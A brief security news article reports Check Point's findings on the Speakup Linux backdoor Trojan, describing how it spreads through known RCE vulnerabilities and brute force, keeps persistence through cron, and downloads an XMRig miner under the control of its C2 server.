Security researchers have discovered a new Trojan horse malware campaign used by hackers to launch attacks on Linux servers.
Trojan horses are malware variants that are disguised as benign or useful pieces of software. They are installed under false pretences, as the user if often tricked into believing that they serve a legitimate purpose. Once executed on a server, the hacker can then gain access to the system and steal valuable information for nefarious purposes. The Trojans are often installed through a phishing campaign.
The new Trojan campaign was discovered by security researchers at Check Point, an IT security company. TheTrojan, named Speakup, is currently being used to launch attacks on Linus servers, but the researchers have identified that it could potentially be used on Mac devices too.
The Trojan is deployed via exploits of vulnerabilities across six Linux distributions, including the recently identified ThinkPHP vulnerability, CVE-2018-20062.
The current campaign is targeting Linux devices in China, India, the Philippines, and Latin America. The Trojan was first detected in late December, but infections have increased considerably since January 22, 2019. Several AV engines are now recognising the malware, but, at the time of analysis, the malware was not being detected as malicious.
Once installed, the malware communicates with its C2 server and registers the victim’s machine. The malware attempts to spread laterally within the infected subnet via a range of RCE vulnerabilities including CVE-2012-0874, CVE-2010-1871, CVE-2017-10271, CVE-2018-2894, CVE-2016-3088, the Hadoop YARN ResourceManager command execution flaw, and a JBoss AS 3/4/5/6 RCE vulnerability.
A Python script is included which scans for further Linux servers within both internal and external subnets. Access is gained through brute force means using a pre-defined list of usernames/passwords. Persistence is achieved via cron and an internal mutex which ensures only one instance remains alive at any one time.
The Speakup Linux backdoor Trojan continuously communicates with its C2 and downloads and runs a range of different files, including an XMRig miner. The Trojan, under its C2 control, can run arbitrary code, download and execute files, stop running processes on an infected host, uninstall programs, and update installed files.
Check Point researchers have attributed the Speakup Linux backdoor Trojan to a threat actor known as Zettabithf.
The complex nature of the malware suggests it is likely that the goal of the attacker is not only to deploy cryptocurrency miners. Once infected, any number of different malware payloads can be deployed. Researchers at Check Point warn that the threat actor may launch a more aggressive campaign in the future.
